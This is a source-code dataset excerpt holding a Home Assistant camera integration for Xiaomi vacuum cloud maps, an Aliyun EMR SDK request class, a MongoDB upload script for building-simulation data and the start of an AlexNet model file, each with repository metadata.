rooms = []
if self._map_data.rooms is not None:
rooms = dict(
filter(lambda x: x[0] is not None, map(lambda x: (x[0], x[1].name), self._map_data.rooms.items())))
if len(rooms) == 0:
rooms = list(self._map_data.rooms.keys())
for name, value in {
ATTRIBUTE_CALIBRATION: self._map_data.calibration(),
ATTRIBUTE_CHARGER: self._map_data.charger,
ATTRIBUTE_CLEANED_ROOMS: self._map_data.cleaned_rooms,
ATTRIBUTE_COUNTRY: self._country,
ATTRIBUTE_GOTO: self._map_data.goto,
ATTRIBUTE_GOTO_PATH: self._map_data.goto_path,
ATTRIBUTE_GOTO_PREDICTED_PATH: self._map_data.predicted_path,
ATTRIBUTE_IGNORED_OBSTACLES: self._map_data.ignored_obstacles,
ATTRIBUTE_IGNORED_OBSTACLES_WITH_PHOTO: self._map_data.ignored_obstacles_with_photo,
ATTRIBUTE_IMAGE: self._map_data.image,
ATTRIBUTE_IS_EMPTY: self._map_data.image.is_empty,
ATTRIBUTE_MAP_NAME: self._map_data.map_name,
ATTRIBUTE_NO_GO_AREAS: self._map_data.no_go_areas,
ATTRIBUTE_NO_MOPPING_AREAS: self._map_data.no_mopping_areas,
ATTRIBUTE_OBSTACLES: self._map_data.obstacles,
ATTRIBUTE_OBSTACLES_WITH_PHOTO: self._map_data.obstacles_with_photo,
ATTRIBUTE_PATH: self._map_data.path,
ATTRIBUTE_ROOM_NUMBERS: rooms,
ATTRIBUTE_ROOMS: self._map_data.rooms,
ATTRIBUTE_VACUUM_POSITION: self._map_data.vacuum_position,
ATTRIBUTE_VACUUM_ROOM: self._map_data.vacuum_room,
ATTRIBUTE_VACUUM_ROOM_NAME: self._map_data.vacuum_room_name,
ATTRIBUTE_WALLS: self._map_data.walls,
ATTRIBUTE_ZONES: self._map_data.zones
}.items():
if name in self._attributes:
attributes[name] = value
if self._store_map_raw:
attributes[ATTRIBUTE_MAP_SAVED] = self._map_saved
if self._device is not None:
attributes[ATTR_MODEL] = self._device.model
attributes[ATTR_USED_API] = self._used_api
return attributes
@property
def should_poll(self):
return self._should_poll
def update(self):
counter = 10
if self._status != CameraStatus.TWO_FACTOR_AUTH_REQUIRED and not self._logged_in:
self._handle_login()
if self._device is None and self._logged_in:
self._handle_device()
map_name = self._handle_map_name(counter)
if map_name == "retry" and self._device is not None:
self._status = CameraStatus.FAILED_TO_RETRIEVE_MAP_FROM_VACUUM
self._received_map_name_previously = map_name != "retry"
if self._logged_in and map_name != "retry" and self._device is not None:
self._handle_map_data(map_name)
else:
_LOGGER.debug("Unable to retrieve map, reasons: Logged in - %s, map name - %s, device retrieved - %s",
self._logged_in, map_name, self._device is not None)
self._set_map_data(MapDataParser.create_empty(self._colors, str(self._status)))
self._logged_in_previously = self._logged_in
def _handle_login(self):
_LOGGER.debug("Logging in...")
self._logged_in = self._connector.login()
if self._logged_in is None:
_LOGGER.debug("2FA required")
self._status = CameraStatus.TWO_FACTOR_AUTH_REQUIRED
elif self._logged_in:
_LOGGER.debug("Logged in")
self._status = CameraStatus.LOGGED_IN
else:
_LOGGER.debug("Failed to log in")
self._status = CameraStatus.FAILED_LOGIN
if self._logged_in_previously:
_LOGGER.error("Unable to log in, check credentials")
def _handle_device(self):
_LOGGER.debug("Retrieving device info, country: %s", self._country)
country, user_id, device_id, model = self._connector.get_device_details(self._vacuum.token, self._country)
if model is not None:
self._country = country
_LOGGER.debug("Retrieved device model: %s", model)
self._device = self._create_device(user_id, device_id, model)
_LOGGER.debug("Created device, used api: %s", self._used_api)
else:
_LOGGER.error("Failed to retrieve model")
self._status = CameraStatus.FAILED_TO_RETRIEVE_DEVICE
def _handle_map_name(self, counter):
map_name = "retry"
if self._device is not None and not self._device.should_get_map_from_vacuum():
map_name = "0"
while map_name == "retry" and counter > 0:
_LOGGER.debug("Retrieving map name from device")
time.sleep(0.1)
try:
map_name = self._vacuum.map()[0]
_LOGGER.debug("Map name %s", map_name)
except OSError as exc:
_LOGGER.error("Got OSError while fetching the state: %s", exc)
except miio.DeviceException as exc:
if self._received_map_name_previously:
_LOGGER.warning("Got exception while fetching the state: %s", exc)
self._received_map_name_previously = False
finally:
counter = counter - 1
return map_name
def _handle_map_data(self, map_name):
_LOGGER.debug("Retrieving map from Xiaomi cloud")
store_map_path = self._store_map_path if self._store_map_raw else None
map_data, map_stored = self._device.get_map(map_name, self._colors, self._drawables, self._texts,
self._sizes, self._image_config, store_map_path)
if map_data is not None:
# noinspection PyBroadException
try:
_LOGGER.debug("Map data retrieved")
self._set_map_data(map_data)
self._map_saved = map_stored
if self._map_data.image.is_empty:
_LOGGER.debug("Map is empty")
self._status = CameraStatus.EMPTY_MAP
else:
_LOGGER.debug("Map is ok")
self._status = CameraStatus.OK
except:
_LOGGER.warning("Unable to parse map data")
self._status = CameraStatus.UNABLE_TO_PARSE_MAP
else:
self._logged_in = False
_LOGGER.warning("Unable to retrieve map data")
self._status = CameraStatus.UNABLE_TO_RETRIEVE_MAP
def _set_map_data(self, map_data):
img_byte_arr = io.BytesIO()
map_data.image.data.save(img_byte_arr, format='PNG')
self._image = img_byte_arr.getvalue()
self._map_data = map_data
self._store_image()
def _create_device(self, user_id, device_id, model):
self._used_api = self._detect_api(model)
if self._used_api == CONF_AVAILABLE_API_XIAOMI:
return XiaomiVacuum(self._connector, self._country, user_id, device_id, model)
if self._used_api == CONF_AVAILABLE_API_VIOMI:
return ViomiVacuum(self._connector, self._country, user_id, device_id, model)
if self._used_api == CONF_AVAILABLE_API_ROIDMI:
return RoidmiVacuum(self._connector, self._country, user_id, device_id, model)
if self._used_api == CONF_AVAILABLE_API_DREAME:
return DreameVacuum(self._connector, self._country, user_id, device_id, model)
return XiaomiVacuum(self._connector, self._country, user_id, device_id, model)
def _detect_api(self, model: str):
if self._forced_api is not None:
return self._forced_api
if model in API_EXCEPTIONS:
return API_EXCEPTIONS[model]
def list_contains_model(prefixes):
return len(list(filter(lambda x: model.startswith(x), prefixes))) > 0
filtered = list(filter(lambda x: list_contains_model(x[1]), AVAILABLE_APIS.items()))
if len(filtered) > 0:
return filtered[0][0]
return CONF_AVAILABLE_API_XIAOMI
def _store_image(self):
if self._store_map_image:
try:
image = Image.open(io.BytesIO(self._image))
image.save(f"{self._store_map_path}/map_image_{self._device.model}.png")
except:
_LOGGER.warning("Error while saving image")
class CameraStatus(Enum):
EMPTY_MAP = 'Empty map'
FAILED_LOGIN = 'Failed to login'
FAILED_TO_RETRIEVE_DEVICE = 'Failed to retrieve device'
FAILED_TO_RETRIEVE_MAP_FROM_VACUUM = 'Failed to retrieve map from vacuum'
INITIALIZING = 'Initializing'
NOT_LOGGED_IN = 'Not logged in'
OK = 'OK'
LOGGED_IN = 'Logged in'
TWO_FACTOR_AUTH_REQUIRED = 'Two factor auth required (see logs)'
UNABLE_TO_PARSE_MAP = 'Unable to parse map'
UNABLE_TO_RETRIEVE_MAP = 'Unable to retrieve map'
def __str__(self):
return str(self._value_)
| 45.592875
| 119
| 0.661904
|
import io
import logging
import time
from datetime import timedelta
from enum import Enum
import miio
import PIL.Image as Image
import voluptuous as vol
from homeassistant.components.camera import Camera, ENTITY_ID_FORMAT, PLATFORM_SCHEMA, SUPPORT_ON_OFF
from homeassistant.const import CONF_HOST, CONF_NAME, CONF_PASSWORD, CONF_TOKEN, CONF_USERNAME
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.entity import generate_entity_id
from homeassistant.helpers.reload import async_setup_reload_service
from custom_components.xiaomi_cloud_map_extractor.common.map_data_parser import MapDataParser
from custom_components.xiaomi_cloud_map_extractor.common.xiaomi_cloud_connector import XiaomiCloudConnector
from custom_components.xiaomi_cloud_map_extractor.const import *
from custom_components.xiaomi_cloud_map_extractor.dreame.vacuum import DreameVacuum
from custom_components.xiaomi_cloud_map_extractor.roidmi.vacuum import RoidmiVacuum
from custom_components.xiaomi_cloud_map_extractor.viomi.vacuum import ViomiVacuum
from custom_components.xiaomi_cloud_map_extractor.xiaomi.vacuum import XiaomiVacuum
_LOGGER = logging.getLogger(__name__)
SCAN_INTERVAL = timedelta(seconds=5)
DEFAULT_TRIMS = {
CONF_LEFT: 0,
CONF_RIGHT: 0,
CONF_TOP: 0,
CONF_BOTTOM: 0
}
DEFAULT_SIZES = {
CONF_SIZE_VACUUM_RADIUS: 4,
CONF_SIZE_IGNORED_OBSTACLE_RADIUS: 3,
CONF_SIZE_IGNORED_OBSTACLE_WITH_PHOTO_RADIUS: 3,
CONF_SIZE_OBSTACLE_RADIUS: 3,
CONF_SIZE_OBSTACLE_WITH_PHOTO_RADIUS: 3,
CONF_SIZE_CHARGER_RADIUS: 4
}
COLOR_SCHEMA = vol.Or(
vol.All(vol.Length(min=3, max=3), vol.ExactSequence((cv.byte, cv.byte, cv.byte)), vol.Coerce(tuple)),
vol.All(vol.Length(min=4, max=4), vol.ExactSequence((cv.byte, cv.byte, cv.byte, cv.byte)), vol.Coerce(tuple))
)
PERCENT_SCHEMA = vol.All(vol.Coerce(float), vol.Range(min=0, max=100))
POSITIVE_FLOAT_SCHEMA = vol.All(vol.Coerce(float), vol.Range(min=0))
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_TOKEN): vol.All(str, vol.Length(min=32, max=32)),
vol.Required(CONF_USERNAME): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
vol.Optional(CONF_COUNTRY, default=None): vol.Or(vol.In(CONF_AVAILABLE_COUNTRIES), vol.Equal(None)),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_AUTO_UPDATE, default=True): cv.boolean,
vol.Optional(CONF_COLORS, default={}): vol.Schema({
vol.In(CONF_AVAILABLE_COLORS): COLOR_SCHEMA
}),
vol.Optional(CONF_ROOM_COLORS, default={}): vol.Schema({
cv.positive_int: COLOR_SCHEMA
}),
vol.Optional(CONF_DRAW, default=[]): vol.All(cv.ensure_list, [vol.In(CONF_AVAILABLE_DRAWABLES)]),
vol.Optional(CONF_MAP_TRANSFORM, default={CONF_SCALE: 1, CONF_ROTATE: 0, CONF_TRIM: DEFAULT_TRIMS}):
vol.Schema({
vol.Optional(CONF_SCALE, default=1): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_ROTATE, default=0): vol.In([0, 90, 180, 270]),
vol.Optional(CONF_TRIM, default=DEFAULT_TRIMS): vol.Schema({
vol.Optional(CONF_LEFT, default=0): PERCENT_SCHEMA,
vol.Optional(CONF_RIGHT, default=0): PERCENT_SCHEMA,
vol.Optional(CONF_TOP, default=0): PERCENT_SCHEMA,
vol.Optional(CONF_BOTTOM, default=0): PERCENT_SCHEMA
}),
}),
vol.Optional(CONF_ATTRIBUTES, default=[]): vol.All(cv.ensure_list, [vol.In(CONF_AVAILABLE_ATTRIBUTES)]),
vol.Optional(CONF_TEXTS, default=[]):
vol.All(cv.ensure_list, [vol.Schema({
vol.Required(CONF_TEXT): cv.string,
vol.Required(CONF_X): vol.Coerce(float),
vol.Required(CONF_Y): vol.Coerce(float),
vol.Optional(CONF_COLOR, default=(0, 0, 0)): COLOR_SCHEMA,
vol.Optional(CONF_FONT, default=None): vol.Or(cv.string, vol.Equal(None)),
vol.Optional(CONF_FONT_SIZE, default=0): cv.positive_int
})]),
vol.Optional(CONF_SIZES, default=DEFAULT_SIZES): vol.Schema({
vol.Optional(CONF_SIZE_VACUUM_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_VACUUM_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_IGNORED_OBSTACLE_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_IGNORED_OBSTACLE_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_IGNORED_OBSTACLE_WITH_PHOTO_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_IGNORED_OBSTACLE_WITH_PHOTO_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_OBSTACLE_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_OBSTACLE_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_OBSTACLE_WITH_PHOTO_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_OBSTACLE_WITH_PHOTO_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_CHARGER_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_CHARGER_RADIUS]): POSITIVE_FLOAT_SCHEMA
}),
vol.Optional(CONF_STORE_MAP_RAW, default=False): cv.boolean,
vol.Optional(CONF_STORE_MAP_IMAGE, default=False): cv.boolean,
vol.Optional(CONF_STORE_MAP_PATH, default="/tmp"): cv.string,
vol.Optional(CONF_FORCE_API, default=None): vol.Or(vol.In(CONF_AVAILABLE_APIS), vol.Equal(None))
})
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
await async_setup_reload_service(hass, DOMAIN, PLATFORMS)
host = config[CONF_HOST]
token = config[CONF_TOKEN]
username = config[CONF_USERNAME]
password = config[CONF_PASSWORD]
country = config[CONF_COUNTRY]
name = config[CONF_NAME]
should_poll = config[CONF_AUTO_UPDATE]
image_config = config[CONF_MAP_TRANSFORM]
colors = config[CONF_COLORS]
room_colors = config[CONF_ROOM_COLORS]
for room, color in room_colors.items():
colors[f"{COLOR_ROOM_PREFIX}{room}"] = color
drawables = config[CONF_DRAW]
sizes = config[CONF_SIZES]
texts = config[CONF_TEXTS]
if DRAWABLE_ALL in drawables:
drawables = CONF_AVAILABLE_DRAWABLES[1:]
attributes = config[CONF_ATTRIBUTES]
store_map_raw = config[CONF_STORE_MAP_RAW]
store_map_image = config[CONF_STORE_MAP_IMAGE]
store_map_path = config[CONF_STORE_MAP_PATH]
force_api = config[CONF_FORCE_API]
entity_id = generate_entity_id(ENTITY_ID_FORMAT, name, hass=hass)
async_add_entities([VacuumCamera(entity_id, host, token, username, password, country, name, should_poll,
image_config, colors, drawables, sizes, texts, attributes, store_map_raw,
store_map_image, store_map_path, force_api)])
class VacuumCamera(Camera):
def __init__(self, entity_id, host, token, username, password, country, name, should_poll, image_config, colors,
drawables, sizes, texts, attributes, store_map_raw, store_map_image, store_map_path, force_api):
super().__init__()
self.entity_id = entity_id
self.content_type = CONTENT_TYPE
self._vacuum = miio.Vacuum(host, token)
self._connector = XiaomiCloudConnector(username, password)
self._status = CameraStatus.INITIALIZING
self._device = None
self._name = name
self._should_poll = should_poll
self._image_config = image_config
self._colors = colors
self._drawables = drawables
self._sizes = sizes
self._texts = texts
self._attributes = attributes
self._store_map_raw = store_map_raw
self._store_map_image = store_map_image
self._store_map_path = store_map_path
self._forced_api = force_api
self._used_api = None
self._map_saved = None
self._image = None
self._map_data = None
self._logged_in = False
self._logged_in_previously = True
self._received_map_name_previously = True
self._country = country
async def async_added_to_hass(self) -> None:
self.async_schedule_update_ha_state(True)
@property
def frame_interval(self):
return 1
def camera_image(self):
return self._image
@property
def name(self):
return self._name
def turn_on(self):
self._should_poll = True
def turn_off(self):
self._should_poll = False
@property
def supported_features(self):
return SUPPORT_ON_OFF
@property
def device_state_attributes(self):
attributes = {}
if self._map_data is not None:
rooms = []
if self._map_data.rooms is not None:
rooms = dict(
filter(lambda x: x[0] is not None, map(lambda x: (x[0], x[1].name), self._map_data.rooms.items())))
if len(rooms) == 0:
rooms = list(self._map_data.rooms.keys())
for name, value in {
ATTRIBUTE_CALIBRATION: self._map_data.calibration(),
ATTRIBUTE_CHARGER: self._map_data.charger,
ATTRIBUTE_CLEANED_ROOMS: self._map_data.cleaned_rooms,
ATTRIBUTE_COUNTRY: self._country,
ATTRIBUTE_GOTO: self._map_data.goto,
ATTRIBUTE_GOTO_PATH: self._map_data.goto_path,
ATTRIBUTE_GOTO_PREDICTED_PATH: self._map_data.predicted_path,
ATTRIBUTE_IGNORED_OBSTACLES: self._map_data.ignored_obstacles,
ATTRIBUTE_IGNORED_OBSTACLES_WITH_PHOTO: self._map_data.ignored_obstacles_with_photo,
ATTRIBUTE_IMAGE: self._map_data.image,
ATTRIBUTE_IS_EMPTY: self._map_data.image.is_empty,
ATTRIBUTE_MAP_NAME: self._map_data.map_name,
ATTRIBUTE_NO_GO_AREAS: self._map_data.no_go_areas,
ATTRIBUTE_NO_MOPPING_AREAS: self._map_data.no_mopping_areas,
ATTRIBUTE_OBSTACLES: self._map_data.obstacles,
ATTRIBUTE_OBSTACLES_WITH_PHOTO: self._map_data.obstacles_with_photo,
ATTRIBUTE_PATH: self._map_data.path,
ATTRIBUTE_ROOM_NUMBERS: rooms,
ATTRIBUTE_ROOMS: self._map_data.rooms,
ATTRIBUTE_VACUUM_POSITION: self._map_data.vacuum_position,
ATTRIBUTE_VACUUM_ROOM: self._map_data.vacuum_room,
ATTRIBUTE_VACUUM_ROOM_NAME: self._map_data.vacuum_room_name,
ATTRIBUTE_WALLS: self._map_data.walls,
ATTRIBUTE_ZONES: self._map_data.zones
}.items():
if name in self._attributes:
attributes[name] = value
if self._store_map_raw:
attributes[ATTRIBUTE_MAP_SAVED] = self._map_saved
if self._device is not None:
attributes[ATTR_MODEL] = self._device.model
attributes[ATTR_USED_API] = self._used_api
return attributes
@property
def should_poll(self):
return self._should_poll
def update(self):
counter = 10
if self._status != CameraStatus.TWO_FACTOR_AUTH_REQUIRED and not self._logged_in:
self._handle_login()
if self._device is None and self._logged_in:
self._handle_device()
map_name = self._handle_map_name(counter)
if map_name == "retry" and self._device is not None:
self._status = CameraStatus.FAILED_TO_RETRIEVE_MAP_FROM_VACUUM
self._received_map_name_previously = map_name != "retry"
if self._logged_in and map_name != "retry" and self._device is not None:
self._handle_map_data(map_name)
else:
_LOGGER.debug("Unable to retrieve map, reasons: Logged in - %s, map name - %s, device retrieved - %s",
self._logged_in, map_name, self._device is not None)
self._set_map_data(MapDataParser.create_empty(self._colors, str(self._status)))
self._logged_in_previously = self._logged_in
def _handle_login(self):
_LOGGER.debug("Logging in...")
self._logged_in = self._connector.login()
if self._logged_in is None:
_LOGGER.debug("2FA required")
self._status = CameraStatus.TWO_FACTOR_AUTH_REQUIRED
elif self._logged_in:
_LOGGER.debug("Logged in")
self._status = CameraStatus.LOGGED_IN
else:
_LOGGER.debug("Failed to log in")
self._status = CameraStatus.FAILED_LOGIN
if self._logged_in_previously:
_LOGGER.error("Unable to log in, check credentials")
def _handle_device(self):
_LOGGER.debug("Retrieving device info, country: %s", self._country)
country, user_id, device_id, model = self._connector.get_device_details(self._vacuum.token, self._country)
if model is not None:
self._country = country
_LOGGER.debug("Retrieved device model: %s", model)
self._device = self._create_device(user_id, device_id, model)
_LOGGER.debug("Created device, used api: %s", self._used_api)
else:
_LOGGER.error("Failed to retrieve model")
self._status = CameraStatus.FAILED_TO_RETRIEVE_DEVICE
def _handle_map_name(self, counter):
map_name = "retry"
if self._device is not None and not self._device.should_get_map_from_vacuum():
map_name = "0"
while map_name == "retry" and counter > 0:
_LOGGER.debug("Retrieving map name from device")
time.sleep(0.1)
try:
map_name = self._vacuum.map()[0]
_LOGGER.debug("Map name %s", map_name)
except OSError as exc:
_LOGGER.error("Got OSError while fetching the state: %s", exc)
except miio.DeviceException as exc:
if self._received_map_name_previously:
_LOGGER.warning("Got exception while fetching the state: %s", exc)
self._received_map_name_previously = False
finally:
counter = counter - 1
return map_name
def _handle_map_data(self, map_name):
_LOGGER.debug("Retrieving map from Xiaomi cloud")
store_map_path = self._store_map_path if self._store_map_raw else None
map_data, map_stored = self._device.get_map(map_name, self._colors, self._drawables, self._texts,
self._sizes, self._image_config, store_map_path)
if map_data is not None:
try:
_LOGGER.debug("Map data retrieved")
self._set_map_data(map_data)
self._map_saved = map_stored
if self._map_data.image.is_empty:
_LOGGER.debug("Map is empty")
self._status = CameraStatus.EMPTY_MAP
else:
_LOGGER.debug("Map is ok")
self._status = CameraStatus.OK
except:
_LOGGER.warning("Unable to parse map data")
self._status = CameraStatus.UNABLE_TO_PARSE_MAP
else:
self._logged_in = False
_LOGGER.warning("Unable to retrieve map data")
self._status = CameraStatus.UNABLE_TO_RETRIEVE_MAP
def _set_map_data(self, map_data):
img_byte_arr = io.BytesIO()
map_data.image.data.save(img_byte_arr, format='PNG')
self._image = img_byte_arr.getvalue()
self._map_data = map_data
self._store_image()
def _create_device(self, user_id, device_id, model):
self._used_api = self._detect_api(model)
if self._used_api == CONF_AVAILABLE_API_XIAOMI:
return XiaomiVacuum(self._connector, self._country, user_id, device_id, model)
if self._used_api == CONF_AVAILABLE_API_VIOMI:
return ViomiVacuum(self._connector, self._country, user_id, device_id, model)
if self._used_api == CONF_AVAILABLE_API_ROIDMI:
return RoidmiVacuum(self._connector, self._country, user_id, device_id, model)
if self._used_api == CONF_AVAILABLE_API_DREAME:
return DreameVacuum(self._connector, self._country, user_id, device_id, model)
return XiaomiVacuum(self._connector, self._country, user_id, device_id, model)
def _detect_api(self, model: str):
if self._forced_api is not None:
return self._forced_api
if model in API_EXCEPTIONS:
return API_EXCEPTIONS[model]
def list_contains_model(prefixes):
return len(list(filter(lambda x: model.startswith(x), prefixes))) > 0
filtered = list(filter(lambda x: list_contains_model(x[1]), AVAILABLE_APIS.items()))
if len(filtered) > 0:
return filtered[0][0]
return CONF_AVAILABLE_API_XIAOMI
def _store_image(self):
if self._store_map_image:
try:
image = Image.open(io.BytesIO(self._image))
image.save(f"{self._store_map_path}/map_image_{self._device.model}.png")
except:
_LOGGER.warning("Error while saving image")
class CameraStatus(Enum):
EMPTY_MAP = 'Empty map'
FAILED_LOGIN = 'Failed to login'
FAILED_TO_RETRIEVE_DEVICE = 'Failed to retrieve device'
FAILED_TO_RETRIEVE_MAP_FROM_VACUUM = 'Failed to retrieve map from vacuum'
INITIALIZING = 'Initializing'
NOT_LOGGED_IN = 'Not logged in'
OK = 'OK'
LOGGED_IN = 'Logged in'
TWO_FACTOR_AUTH_REQUIRED = 'Two factor auth required (see logs)'
UNABLE_TO_PARSE_MAP = 'Unable to parse map'
UNABLE_TO_RETRIEVE_MAP = 'Unable to retrieve map'
def __str__(self):
return str(self._value_)
| true
| true
|
1c42205c2c3bdfdbae7dda9529705e4baf7faae6
| 1,586
|
py
|
Python
|
aliyun-python-sdk-emr/aliyunsdkemr/request/v20160408/DeleteNoteRequest.py
|
liumihust/aliyun-openapi-python-sdk
|
c7b5dd4befae4b9c59181654289f9272531207ef
|
[
"Apache-2.0"
] | null | null | null |
aliyun-python-sdk-emr/aliyunsdkemr/request/v20160408/DeleteNoteRequest.py
|
liumihust/aliyun-openapi-python-sdk
|
c7b5dd4befae4b9c59181654289f9272531207ef
|
[
"Apache-2.0"
] | null | null | null |
aliyun-python-sdk-emr/aliyunsdkemr/request/v20160408/DeleteNoteRequest.py
|
liumihust/aliyun-openapi-python-sdk
|
c7b5dd4befae4b9c59181654289f9272531207ef
|
[
"Apache-2.0"
] | null | null | null |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkemr.endpoint import endpoint_data
class DeleteNoteRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Emr', '2016-04-08', 'DeleteNote','emr')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_ResourceOwnerId(self):
return self.get_query_params().get('ResourceOwnerId')
def set_ResourceOwnerId(self,ResourceOwnerId):
self.add_query_param('ResourceOwnerId',ResourceOwnerId)
def get_Id(self):
return self.get_query_params().get('Id')
def set_Id(self,Id):
self.add_query_param('Id',Id)
| 36.883721
| 75
| 0.750315
|
from aliyunsdkcore.request import RpcRequest
from aliyunsdkemr.endpoint import endpoint_data
class DeleteNoteRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Emr', '2016-04-08', 'DeleteNote','emr')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_ResourceOwnerId(self):
return self.get_query_params().get('ResourceOwnerId')
def set_ResourceOwnerId(self,ResourceOwnerId):
self.add_query_param('ResourceOwnerId',ResourceOwnerId)
def get_Id(self):
return self.get_query_params().get('Id')
def set_Id(self,Id):
self.add_query_param('Id',Id)
| true
| true
|
1c422200b03e653ed0fce33c03d778100afa9fd7
| 2,131
|
py
|
Python
|
data_process/2d_1d/simon/upload_data_to_db.py
|
ribuild/delphin_6_automation
|
12024381fc1042b46314c55d88b6349229ea33b7
|
[
"MIT"
] | 2
|
2017-11-08T18:37:36.000Z
|
2018-01-09T12:10:58.000Z
|
data_process/2d_1d/simon/upload_data_to_db.py
|
ribuild/delphin_6_automation
|
12024381fc1042b46314c55d88b6349229ea33b7
|
[
"MIT"
] | 111
|
2018-02-26T08:25:44.000Z
|
2021-03-31T19:17:19.000Z
|
data_process/2d_1d/simon/upload_data_to_db.py
|
thp44/delphin_6_automation
|
12024381fc1042b46314c55d88b6349229ea33b7
|
[
"MIT"
] | 3
|
2017-11-06T10:01:25.000Z
|
2018-02-14T09:45:28.000Z
|
__author__ = "Christian Kongsgaard"
__license__ = 'MIT'
# -------------------------------------------------------------------------------------------------------------------- #
# IMPORTS
# Modules
import os
import json
# RiBuild Modules
from delphin_6_automation.database_interactions import mongo_setup
from delphin_6_automation.database_interactions.auth import auth_2d_1d as auth_dict
from delphin_6_automation.database_interactions import weather_interactions
from delphin_6_automation.database_interactions import delphin_interactions
from delphin_6_automation.database_interactions import material_interactions
from delphin_6_automation.database_interactions import sampling_interactions
from delphin_6_automation.database_interactions.db_templates import sample_entry
# -------------------------------------------------------------------------------------------------------------------- #
# RIBuild
server = mongo_setup.global_init(auth_dict)
def upload_materials(folder):
for file in os.listdir(folder):
material_interactions.upload_material_file(f'{folder}/{file}')
def upload_weather(folder):
for file in os.listdir(folder):
print(file)
weather_interactions.upload_weather_to_db(os.path.join(folder, file))
def upload_strategy(folder):
strategy = os.path.join(folder, 'sampling_strategy.json')
with open(strategy) as file:
data = json.load(file)
sampling_interactions.upload_sampling_strategy(data)
def upload_designs(folder):
strategy = sample_entry.Strategy.objects().first()
for file in os.listdir(folder):
delphin_interactions.upload_design_file(os.path.join(folder, file), strategy.id)
# upload_weather(r'C:\Users\ocni\OneDrive - Danmarks Tekniske Universitet\Shared WP6 DTU-SBiAAU\weather\WAC')
# upload_materials(r'C:\Program Files\IBK\Delphin 6.0\resources\DB_materials')
upload_strategy(r'C:\Users\ocni\OneDrive - Danmarks Tekniske Universitet\Shared WP6 DTU-SBiAAU\sampling_strategy')
upload_designs(r'C:\Users\ocni\OneDrive - Danmarks Tekniske Universitet\Shared WP6 DTU-SBiAAU\designs')
mongo_setup.global_end_ssh(server)
| 36.118644
| 120
| 0.714688
|
__author__ = "Christian Kongsgaard"
__license__ = 'MIT'
import os
import json
from delphin_6_automation.database_interactions import mongo_setup
from delphin_6_automation.database_interactions.auth import auth_2d_1d as auth_dict
from delphin_6_automation.database_interactions import weather_interactions
from delphin_6_automation.database_interactions import delphin_interactions
from delphin_6_automation.database_interactions import material_interactions
from delphin_6_automation.database_interactions import sampling_interactions
from delphin_6_automation.database_interactions.db_templates import sample_entry
server = mongo_setup.global_init(auth_dict)
def upload_materials(folder):
for file in os.listdir(folder):
material_interactions.upload_material_file(f'{folder}/{file}')
def upload_weather(folder):
for file in os.listdir(folder):
print(file)
weather_interactions.upload_weather_to_db(os.path.join(folder, file))
def upload_strategy(folder):
strategy = os.path.join(folder, 'sampling_strategy.json')
with open(strategy) as file:
data = json.load(file)
sampling_interactions.upload_sampling_strategy(data)
def upload_designs(folder):
strategy = sample_entry.Strategy.objects().first()
for file in os.listdir(folder):
delphin_interactions.upload_design_file(os.path.join(folder, file), strategy.id)
upload_strategy(r'C:\Users\ocni\OneDrive - Danmarks Tekniske Universitet\Shared WP6 DTU-SBiAAU\sampling_strategy')
upload_designs(r'C:\Users\ocni\OneDrive - Danmarks Tekniske Universitet\Shared WP6 DTU-SBiAAU\designs')
mongo_setup.global_end_ssh(server)
| true
| true
|
1c4222c1e21b8471a57878aeb66220ab3d64daec
| 1,812
|
py
|
Python
|
code/models/AlexNet.py
|
ArvindSubramaniam/Pruning-Networks-using-Neuron2Neuron-Skip-Connections
|
bbe402bbf4c5afb4ae712354e8fca5ce320501b8
|
[
"Apache-2.0"
] | 1
|
2021-11-16T03:36:51.000Z
|
2021-11-16T03:36:51.000Z
|
code/models/AlexNet.py
|
ArvindSubramaniam/Pruning-Networks-using-Neuron2Neuron-Skip-Connections
|
bbe402bbf4c5afb4ae712354e8fca5ce320501b8
|
[
"Apache-2.0"
] | null | null | null |
code/models/AlexNet.py
|
ArvindSubramaniam/Pruning-Networks-using-Neuron2Neuron-Skip-Connections
|
bbe402bbf4c5afb4ae712354e8fca5ce320501b8
|
[
"Apache-2.0"
] | 3
|
2020-12-29T01:52:01.000Z
|
2021-11-16T03:36:52.000Z
|
import torch.nn as nn
import torch.utils.model_zoo as model_zoo
__all__ = ['AlexNet', 'alexnet']
model_urls = {
'alexnet': 'https://download.pytorch.org/models/alexnet-owt-4df8aa71.pth',
